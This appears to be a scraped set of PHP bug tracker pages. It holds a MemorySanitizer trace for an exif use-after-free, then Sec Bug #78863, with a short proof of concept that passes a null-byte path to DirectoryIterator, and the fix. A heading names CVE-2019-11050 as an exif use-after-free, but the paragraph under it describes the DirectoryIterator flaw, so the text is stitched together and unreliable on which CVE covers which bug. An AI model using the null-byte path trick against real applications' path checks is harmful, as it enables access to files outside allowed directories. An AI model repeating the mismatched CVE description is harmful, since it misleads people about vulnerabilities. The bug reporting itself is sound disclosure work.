    #13 0xcfd036 in exif\_read\_from\_file /home/nikic/php-src-msan/ext/exif/exif.c:4401:8
    #14 0xcf4f80 in zif\_exif\_read\_data /home/nikic/php-src-msan/ext/exif/exif.c:4476:9
    #15 0x322e991 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_UNUSED\_HANDLER /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:1226:2
    #16 0x2d67c7f in execute\_ex /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:51318:7
    #17 0x2d6927f in zend\_execute /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:55571:2
    #18 0x28399d3 in zend\_execute\_scripts /home/nikic/php-src-msan/Zend/zend.c:1645:4
    #19 0x2100536 in php\_execute\_script /home/nikic/php-src-msan/main/main.c:2586:14

  Uninitialized value was stored to memory at
    #0 0xd29af5 in php\_ifd\_get32u /home/nikic/php-src-msan/ext/exif/exif.c:1474:3
    #1 0xd5a57f in exif\_iif\_add\_value /home/nikic/php-src-msan/ext/exif/exif.c:2186:28
    #2 0xd04751 in exif\_iif\_add\_tag /home/nikic/php-src-msan/ext/exif/exif.c:2227:2
    #3 0xd3e3f0 in exif\_process\_IFD\_TAG /home/nikic/php-src-msan/ext/exif/exif.c:3529:2
    #4 0xd49d49 in exif\_process\_IFD\_in\_MAKERNOTE /home/nikic/php-src-msan/ext/exif/exif.c:3172:8
    #5 0xd3ccfd in exif\_process\_IFD\_TAG /home/nikic/php-src-msan/ext/exif/exif.c:3477:10
    #6 0xd274b2 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4148:12
    #7 0xd25f89 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4119:7
    #8 0xd25f89 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4119:7
    #9 0xd25f89 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4119:7
    #10 0xd25f89 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4119:7
    #11 0xd1b38e in exif\_scan\_FILE\_header /home/nikic/php-src-msan/ext/exif/exif.c:4231:9
    #12 0xd1963d in exif\_read\_from\_impl /home/nikic/php-src-msan/ext/exif/exif.c:4357:8
    #13 0xcfb4f0 in exif\_read\_from\_stream /home/nikic/php-src-msan/ext/exif/exif.c:4374:8
    #14 0xcfd036 in exif\_read\_from\_file /home/nikic/php-src-msan/ext/exif/exif.c:4401:8
    #15 0xcf4f80 in zif\_exif\_read\_data /home/nikic/php-src-msan/ext/exif/exif.c:4476:9
    #16 0x322e991 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_UNUSED\_HANDLER /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:1226:2
    #17 0x2d67c7f in execute\_ex /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:51318:7
    #18 0x2d6927f in zend\_execute /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:55571:2
    #19 0x28399d3 in zend\_execute\_scripts /home/nikic/php-src-msan/Zend/zend.c:1645:4

  Uninitialized value was created by a heap deallocation
    #0 0x43ce59 in free (/home/nikic/php-src-msan/sapi/cli/php+0x43ce59)
    #1 0x2542e28 in \_efree\_custom /home/nikic/php-src-msan/Zend/zend\_alloc.c:2425:3
    #2 0x2542402 in \_efree /home/nikic/php-src-msan/Zend/zend\_alloc.c:2545:3
    #3 0xd56453 in exif\_file\_sections\_free /home/nikic/php-src-msan/ext/exif/exif.c:2063:4
    #4 0xd0050c in exif\_discard\_imageinfo /home/nikic/php-src-msan/ext/exif/exif.c:4293:2
    #5 0xcf895b in zif\_exif\_read\_data /home/nikic/php-src-msan/ext/exif/exif.c:4604:2
    #6 0x322e991 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_UNUSED\_HANDLER /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:1226:2
    #7 0x2d67c7f in execute\_ex /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:51318:7
    #8 0x2d6927f in zend\_execute /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:55571:2
    #9 0x28399d3 in zend\_execute\_scripts /home/nikic/php-src-msan/Zend/zend.c:1645:4
    #10 0x2100536 in php\_execute\_script /home/nikic/php-src-msan/main/main.c:2586:14
    #11 0x34c922d in do\_cli /home/nikic/php-src-msan/sapi/cli/php\_cli.c:959:5
    #12 0x34c0e06 in main /home/nikic/php-src-msan/sapi/cli/php\_cli.c:1350:18
    #13 0x7fadee90fb96 in \_\_libc\_start\_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

**Patches**

Add a Patch

**Pull Requests**

Add a Pull Request

**History**

AllCommentsChangesGit/SVN commitsRelated reports

 **\[2019-12-13 14:43 UTC\] nikic@php.net**

\-Assigned To: +Assigned To: kalle

 **\[2019-12-16 08:27 UTC\] stas@php.net**

Should we merge this for upcoming release or still wait for feedback?

 **\[2019-12-16 08:56 UTC\] nikic@php.net**

I believe this should be fine for merge. I've done a couple of hours of fuzzing with this patch as a sanity check, which didn't turn up anything.

 **\[2019-12-16 19:02 UTC\] stas@php.net**

\-Status: Assigned +Status: Closed

 **\[2019-12-16 19:14 UTC\] stas@php.net**

\-CVE-ID: +CVE-ID: 2019-11050

CVE-2019-11050: Use-after-free in exif parsing under memory sanitizer

In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0, PHP DirectoryIterator class accepts filenames with embedded \0 byte and treats them as terminating at that byte. This could lead to security vulnerabilities, e.g. in applications checking paths that the code is allowed to access.

Sec Bug #78863

DirectoryIterator class silently truncates after a null byte

Submitted:

2019-11-23 10:01 UTC

Modified:

2019-12-16 19:01 UTC

From:

ryat@php.net

Assigned:

stas (profile)

Status:

Closed

Package:

SPL related

PHP Version:

7.3.12

OS:

\*

Private report:

No

CVE-ID:

2019-11045

 **\[2019-11-23 10:01 UTC\] ryat@php.net**

Description:
------------
ext/spl/spl\_directory.c:
\`\`\`
void spl\_filesystem\_object\_construct(INTERNAL\_FUNCTION\_PARAMETERS, zend\_long ctor\_flags) /\* {{{ \*/
{
    ...
	if (SPL\_HAS\_FLAG(ctor\_flags, DIT\_CTOR\_FLAGS)) {
		flags = SPL\_FILE\_DIR\_KEY\_AS\_PATHNAME|SPL\_FILE\_DIR\_CURRENT\_AS\_FILEINFO;
		parsed = zend\_parse\_parameters(ZEND\_NUM\_ARGS(), "s|l", &path, &len, &flags);
	} else {
		flags = SPL\_FILE\_DIR\_KEY\_AS\_PATHNAME|SPL\_FILE\_DIR\_CURRENT\_AS\_SELF;
		parsed = zend\_parse\_parameters(ZEND\_NUM\_ARGS(), "s", &path, &len);
	}
\`\`\`

PoC:
\`\`\`
<?php

$dir = new DirectoryIterator("../../ryat\\x00/php");
foreach ($dir as $fileinfo) {
    if (!$fileinfo->isDot()) {
        var\_dump($fileinfo->getFilename());
    }
}

?>
\`\`\`

Fix:
\`\`\`
	if (SPL\_HAS\_FLAG(ctor\_flags, DIT\_CTOR\_FLAGS)) {
		flags = SPL\_FILE\_DIR\_KEY\_AS\_PATHNAME|SPL\_FILE\_DIR\_CURRENT\_AS\_FILEINFO;
		parsed = zend\_parse\_parameters(ZEND\_NUM\_ARGS(), "p|l", &path, &len, &flags);
	} else {
		flags = SPL\_FILE\_DIR\_KEY\_AS\_PATHNAME|SPL\_FILE\_DIR\_CURRENT\_AS\_SELF;
		parsed = zend\_parse\_parameters(ZEND\_NUM\_ARGS(), "p", &path, &len);
	}
\`\`\`

**Patches**

Add a Patch

**Pull Requests**

Add a Pull Request

**History**

AllCommentsChangesGit/SVN commitsRelated reports

 **\[2019-11-25 16:09 UTC\] cmb@php.net**

\-Status: Open +Status: Verified \-Assigned To: +Assigned To: stas

 **\[2019-11-28 09:08 UTC\] stas@php.net**

Will do. Not sure whether it needs a CVE?

 **\[2019-11-29 04:31 UTC\] stas@php.net**

\-CVE-ID: +CVE-ID: 2019-11044

 **\[2019-11-30 22:06 UTC\] stas@php.net**

\-CVE-ID: 2019-11044 +CVE-ID: 2019-11045

 **\[2019-12-16 19:02 UTC\] stas@php.net**

\-Status: Verified +Status: Closed

Tag

#php